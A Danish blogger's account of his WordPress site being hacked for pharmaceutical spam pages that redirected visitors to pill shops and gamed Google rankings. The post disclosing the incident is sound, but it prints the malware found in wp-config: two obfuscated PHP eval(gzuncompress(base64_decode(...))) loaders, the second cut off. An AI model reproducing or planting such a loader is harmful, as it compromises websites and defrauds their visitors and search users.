Se hackerens kode og læs hvordan den narrede Google og forvandlede mit site til en reklamesøjle for impotens- og hårtabs-piller og det der er værre.
De sidste par måneder har en hacker rodet rundt på mit site. Han har, som jeg kan se det, ikke ødelagt noget som sådan. Men han har lavet sine egne små og store blogposter, med indhold jeg absolut ikke selv ville kunne finde på. Om Levitra, Tramadol, Valium, Viagra, Adipex og meget andet godt fra skuffen af hårtabs-, impotens- og hvad har du af skumle piller.
Sådan så det ud:
Mit hackede site – sådan så det ud
Udover de nye sider, som hackeren har lavet, har han faktisk også haft gang i nogen af mine rigtige sider, ser det ud til. Ihvertfald kan man hos Google se spor efter at både min blog-forside og selve sitets forside m.fl. har været berørt. Men når jeg selv kiggede forbi var de fine igen – så hackeren har nok kun skrevet sine grimme ting længe nok til at han nåede målet: Google indekseringen.
Google narret: hackerens egentlige mål er at manipulere Google og skabe trafik til pille-butiks-sites
Sådan virker det: Når du klikker på et af links’ene til de hackede sider, bliver du automatisk sendt, ikke til jon-lund.com, men direkte til en af hackerens net-pille-butikker.
Men det er ikke denne nar-en-jon-lund.com-bruger ind på et viagra-site, der er meningen med hackeriet. Den er anderledes simpel: hackningen er et stort forsøg på at få hackerens egne køb-sjove-piller-sider højere op i Google.
Udover alle de sjove ord, var de hackede sider hos mig nemlig fulde af links og redirects. Redirects til pille-butiks-siderne og links til de andre hackede sider på mit site. Det første for at få Google til at tro, at pille-butiks-siderne er vældigt populære, siden så mange sites (alle os der var/er blevet hacket) sender besøg videre til dem. Det andet, for at få Google til at tro at også de hackede sider er vældigt centrale, som om det var rigtigt gode blog-poster, jeg ikke selv kunne lade være med at linke løs til. Hvis en bruger skulle søge hos Google efter et af de frække ord, ville hacker-pille-butikkerne derfor komme højt op på listen, fordi hackeriet havde narret Google til at tro, at pille-butikken var et kvalitets-site.
Netop tricket med at lade siderne blive gode igen efter de først var blevet hacket, forvirrede mig en del. Hos Google var der fæle overskrifter på mine artikler. Men når jeg så klikkede, var der ikke noget galt. Jeg tænkte først: er det Google der er blevet hacket og laver falske ting? Men nej. Det var mig selv.
Det fandt jeg ud af med god hjælp fra Kasper Bergholt, der har rimeligt godt forstand på hvordan man – i den gode sags tjeneste, forstås! – kommer til tops i Google – og fra Surftowns support-afdeling. Surftown kunne nemlig se at den centrale konfigurations-fil for hele min WordPress-system, wp-config, havde en mystisk kode sat ind øverst. Da den blev fjernet, forsvandt de hackede sider også. Særligt interesserede kan se strengen herunder.
Jeg har selvfølgelig også ændret mine passwords til alt hvad jeg har af ftp-, wordpress-admin mm. konti forbundet med bloggen. Og nu krydser jeg fingre og håber det bedste og venter på at Google skal glemme det grimme intermezzo igen, så intetanende ikke også fremover skal have deres billede af mig og mit site unødigt forstyrret.
Kode-interesseret? Her er den tekststreng med skadelige stoffer, der blev indsat i toppen af min wp-config-fil (du kan også downloade den her). Hvis du kan gennemskue hvad den egentligt gør, må du meget gerne skrive en kommentar!
|
|
<? eval(gzuncompress(base64_decode('eF6VVttu2kAQ/ZU VHIiVRXYBXVV8UAfMLXSVFDFt6pCvkApsSkKIcT u6cXZuQ7lj0Zb2wZ25njmf91r359nl88/2HtRg6H8XQHgqxsH6Oxg8PSXWVJvvl8MMiX2Z/8uWVFYdelTreKrPevLdK/5jS0/F6SUCbwda6fvfKIisnTh7SqbePg8GGdqk9L0xIOpvAY05rSBbw22lF/iWSINI/g6LTqVfQI 6Lxyic03aTjOkxGvEWcZ82sEAWydiItothHIjScOKQlf8b/rBH5Cq0b5/yYNDjLOZV7gra7NPWMi yX1y 9H/mwGqfKv4kegQ4HyMJb3sSZUCATxduKrBfojOP8Yxly4E/2nE Q8mnfW88WR9TV9wj6oztiYyAHsisUS8tfPaNT2PG8FOC4R3qgy8ucoNMeUandOCBMK2wDaOVcx0Siu2SZBSV6HrZ/LKt7mfQM2UfDHahTYi8yI05IR9atv6BHpHqp6rZHqxwHq53L1Rc/ slcvyq5XIiFK9lYdB4XBb72KdzsVW9QqwV4triAP26/iGffmW4URn6lY6FTPl4lFmqUHWMaTR/yqazDr nOpCltOq2oAUxiqXrbzrynYiNVGUtVclUhtqn3i5ldUu6SCU7/BuCPskoZkToeEWGd/uZlnUEbdx1zIkc6JeTRSVvrgDcBbM p0ROhUoV6NJW8g3VRaQGV6lSMcMpIpbajZw59HrSaqdOtW44zbQ9rbVGOQU4GtUoC3nySK2o1idtZkxV58pFBt1I0h8hDBrMcJ JWqkD/d ZOxHJex6KDYtVZitkZJsUkgR9OWVRETNpm7sB7rCnRSrwlEWnAvV9ebFm6f9zK mfftl3DHPKAr1rLehX9F8WZn7AJLFIYHTar833Qq5uEDXF2OnQVMa8/ ob6hCz3zWaHaV/8MnMEURBzxx1X13GCu4r5Xcdu/I9YyeQ9qm7yfnUaDrtYLmp6lX3OtSolNhkQesl1akY6FNxmZWceOpWa98o0/dPWh7Bd7T9YvKBrgr6 pCn15/ AlPEQBQ='))); ?><? eval(gzuncompress(base64_decode('eF61WmmPslq2/iv94SR1Ts5NmvF0kc77wQnFEixRmTo3HQFLFLBMOcLN/e 99tobBwbr7XP7JmUsedZe87CB/XHcBof15/Yv/5Ql6fVv4qvC/frL rf/ WXxo/X1tch fVmkynFkX3g/nfx4 a XxcDkgu7naZRrF30tycZU4o2OJOiZkoeOmblTZeev5Y0nxH/1 lbqOtY 7Hi5ZyuZZ7sKsJiq5nyuKlNz7qnz2JrCpeG2HQWpevAcMwk2XLwQLDkUYAVZOePiQJinoaMp tTTLNWcOPxQNWGpaWnKvVLnHz9uArQZb8zhJ8gwrbk1s1TFmscxoRimZuKlKu8PzI rrC5/XvTVzLfVzXLq5a6dxO8TZKjPtNzozsm/gIJ9ytm1w2REUSRoneFrTL e Cj2xWHO1GRfP0udqXnQVw OcNn56SEfbU0pbCEUpknkicMI/nWFJPL7SU407VvCgkSEahkMhqegb20Wdo/8XPat48I2Ip ycG3j5DvtPUMDQTmwdeFgGIHRsS c8ad94UikUKy6XzjWAbmpR9dZISfH3AFyRKb8emFb5N gHyX FoKb8qD9nCmUeH15B7KOHpW1TBVQeRgtqVKBkBw90dpDJDJEE27RB8WYIFvmXHvIQ278oBIghfjIFTHCrgAa2ebOtaVCWCAY2cJpcwtboSole3 gM2JAjHOQKoWdZC24S6K 2UBqR0xvr69IS9uQXQwElS0mx7AfZb6QxMjO2ntOFLEguI7KL6gaYZ9kDl8YCCxOvo1rFoJ6gJwqouX31XxR2MmflqAruZpaEvN4kCYHX5AjF1xdpEFfjUHXXUB/ qmyh0DEHmUDvt37gscRCwTl5AmXBJlfONfxdoFoYvqk4HGab0tb/fSF12uGUqaL1ErC1ML8coyjmyocLqNfkIMhdV8gtndQ/hlqqqx9EZvHlDDqGXuSFExpV7QyloPzXjQhRLYcL6dtfWEPM9cZynDJIuWptjPPMXJ0Gwn15RQOTGJDKIYi6J8EK8pmgGlCQhw6wz1Uw5po0b/KIVfIGvLvIDmyWFiDcEcDp6EBkONueimYgjeOHk0HPw2RoXDhg20LMwJyFJgK16XE4N3O799XDHRA64t40JZTXzQSz96j/Y5BroaCtcZYsGLtWxGTHPaJTu1TsJ080CuZT2nnYhuYmTLqBAWdyoXS8PPk3xzjD0LSnUh3BH02CxrnCWS3DyXIJE84bwxdWITOQ WECYvU 8DYQNadw65kdNatlda5 /Q9GBAGlpY2CKOwE7FpcIk92/vynHgfCOrO6yR/604 cU1IqruviCOIJBQgrn2fFuv26 HWSECLxNtw6zfBOrqCEnuWNZ3OsVWdoBiOIAcK1uB9klAdGSaMlwRbKPV1/KV1tBQaZgb1k4ATs/epCXokxLKY8IbfuTf1eJg3l2EczS21/QGjom9aQ3X 8zJhpJx3b5mWXqedqlzlvE 1L3KdzBhCgz7oAm/RiBb2ZDc c2/ovwFX9Sn6cbX9cxM32A8z NAYD7P46nb4vI7EaygJrNnhyRdCSLPLIRDkV5rLlwimYwSzJYfG8kry7mOQRIv 68oXARMur64gHz8GYQIt/9Nzhq QwMmy34sWNJU06xC88 fUcXrKm3pYDhPu6825 E5XCYYJfwltK1vOuE bl1Jnut99qAV9q47 6tQgv63RbOz28DdWz0cjgU83CkbJ/jyaJeEbNd/YmMFok8BHy x8chhbfDPJ0NczjgcfIux0ZF/vcDLIupG5ktORJDtvNXNCEpmQ6MkzEuCy hkuRhOJdiaG6/mQwByB6yFcSVXmvsok/D4bzbzwqYDwyuUJxATUrt6oxJMC9Wx0xyXXeSCx9gK5/NSrjHSWEE4XxzofHyzyCAk3tkgiUF9UwncjsfPgMIYdIMLNnMaorvWck0tUruVEnL/pcRDGC3DK6nS6kWTM HpOxAG9zLi7XOKkb1oySSloEBc92UtEWMmN9yR2rt ETZs4PepUS3YZdy2iG4b6TuVHWONJ7B7gngAwDelGQ1ID1Q3DG5zpOalKw9fXFZ88kGDErab8eeTm fqUyytRJ2paRBDvPPHyTL8QVfXuLe3fypa1RCDhSDt6HqvM6LaJ66DGtXq178mGLO1rW9MjqYZx0/k6R QYlFmC dTQf0pkebNb78m4ZqHU xvU7dws9J7s8l0sN08txcYzo8VlsMzUN3PemVRhvgLThtPjCURWG7lbd1mftX2jw91WhRjOJ1VK610/3y4fKs0Oa917kl5YLHquNlfGHcl3lXHPrbYyiMPRTVOJexI6RsI/CRsjEey815AnIuqSsP5cy VKojf1ZhpV0pv12eRMrRtWvLwxgGxF87frVWE2v5DL6lK7E hddAJvWgJ2r7xd5ULmhE48LJCkQKF1JKhmjim1mUglYeMuy1Oyv6E5y5eb7SyWaPljBorUP9 TJN T8N SGN/rYnyvi/G9Lj9h9Ph7QVC0DT0FGlmEUdfLo x fPTksk/yuz3nHVSfmEyHWK5MlsnFuc3Lc8USFxs8Dh7YClV9QUco7rV65RSCHM3RDzNknpdDVgxjotpGFyur/xSsqf8B5uOZcQvuDIsyM65Ry7C66czjdSyfHrlLN7Cd9bDoYHeR0yYwoavMa4zBLRJCM 1W1ehnWosznXsptgY6YSKRzj eTX5cL8fkskCVn2TXgoa9KjIIeOS/mdxqXeOxFVC7Mr1oAxg3ymg2R62MrnuD4O4PGfYuNJ97FKLz2UiutkhjNotIN9rMzzSlWN7eQzHLNuq7l2LurGgv6xLt4vP1Mk16sEOg9sSUUUS9nFw1Ewp7KCRRpSfEC5JOnySMuypV2ro6SLxC6BQeE33GQrhiEN2xUE9rHK3H1h1EOz4bEONZrwrNMQ8MqjwoTGOPQdczukqnEGYMhhBtY/k209iONqRMabs N0McQi5PxeImDnMPL8fEBo71fAyGQRMLILJCZqZi2b/cSlzHLOrxdPZoMuY0bjmZz3CYSPqqKBI0k254AvTbrX6wORJoTO6bNzFlRnd1RtcsgpGPWz9uLUwjsvhSf6LzFBIYb9FaWf3AxJ0TlFW5yktwuX1RGFMlL80JWlOF3OBcWfkAc/WwTDO4VR3zNxjLvW52F3D4FK7bgdzDDRuDAjafw9/IrnkmcoOxBTyD1adwdZo wt sfuoWbP7P4Kd2421JHaxhNTQGlMFN2zkto7Xk1ifTFeafw8JTOMifwqtqfRE4Zm2xQfMCbvB5ATf4vIBrkgl7Pcc2NlW772DchzyBe9USfICrdt/DerX8H DnzCfPV0 qEXuAyxu6R3j nPm8QTWJbWoaZDO4iXkBV5nTsYj3sXm1SnDkz3EMFzfHt1vL7DbNemL1oc8jXLkxvYelyj67BH z qlqUvme4wrjtq3s0BJcs4G hyubdwpn9JFCpa8wmKNjpuJvtjuHyY4zVKo6lQ1kMt3n5RIo7j xE28m5fpiewO2bYAbh/pnBUiSNEP1DyEctnFvgBoeCdKHDW45aQuYPVDMGhgzmKtmxyNcr/GYbiuzp3CltZfgcot7hCvNuQTXRIg IcAddqsmMwkssi1MFe7RzaNavUEuIPr2o ox3OhB0nr1HqM3xXqx8659/HqFy/fvBZzTtGtgTm9Ie3JV8zu46Yb8BtfLLuCmu93ro dHh9JdMhQMvbkqy36AK2P83z6MwiisOWdNHU4dmHOZUJJX8uylL2MFa40Zb6pA1DNV7cnaEd36swMqxdfq/qvmFE7NJU34d14NKqePvnryB5f1wpa3moDmaTx7rTeNLh D9mvgWEmwTV6v524G u59GvnO2gvfsnjD3h46ndc70137svfF8IO80XcEj5xkIS/4vTTcvDwcIvDT62mSURpxvo3v4Kt0RreF92Z5K6MJkUFT56G5chDSfCSYp2CrnwjVHZtAtCDeVh5QpSDSB8YuSK0DedX goc6dp4tc3 CvpQ6 HOg/zHK0BXkzAILHriXnOs4Bv3ofHNSs5/QcFXZ WlC5Iz4vdFJuK/bupJkkk5WTFJKbs/m85q0rqr3qCGRgi/4LWm0bX y4yMPui5sc cLfHTng/Ea7 fvXcgcpQ3Agu7n6tF3JQeT8zSubXxpg3bkCfNVKKi51ifXzMRrlWNw92/twp78bnXae19QY8/GOgyE6BTyytFnZ7CqbilXey aOLyhznr4IOededey1HmSfMx5czqdy4MXcgDO CRxI4d2ILhfQc5dyIKOsvYFU36nTi39JMdumJYxOTnnilczZ31lQ05i YL0h9ZqKvj3Pqb27/CduPbk9/eBuQv7l Q9Rp BjcHrSGTXNufTom9FXld6BcHxciY9qERg4lB6pCAQrCzotHny3aCiK4BQ4UCErKCVZOHAivxOOwXnxuwkzfdZWdNO//OJWqPdyktxDTm6BfkYL5wh2IZJcjsnI6ehLW/CfnLy123RdSafkK9ckPb2xZmQ0YCeA1mKIfjBPIWZDPlmRLhmwxX0X9r6doJSWx8SPzVOwANMTrpQQmdfkBN/O/n0IOyhzZP/j6BW6jnDDLTdvWWt9f/ljOXPyrSsof5Gzu7Unq8kZ2rI9UOypOd7iO2EN561fJsdlLtDKo0fqE3urRN hgPzPF6/niq9WzR4cmiRRHWUGtvFTCFnkCJyDmuYnbfk80LPxEDy5q443AWDye//r XgOdEuLA41Qg/J2vnCwQ7WIVn429 /
| |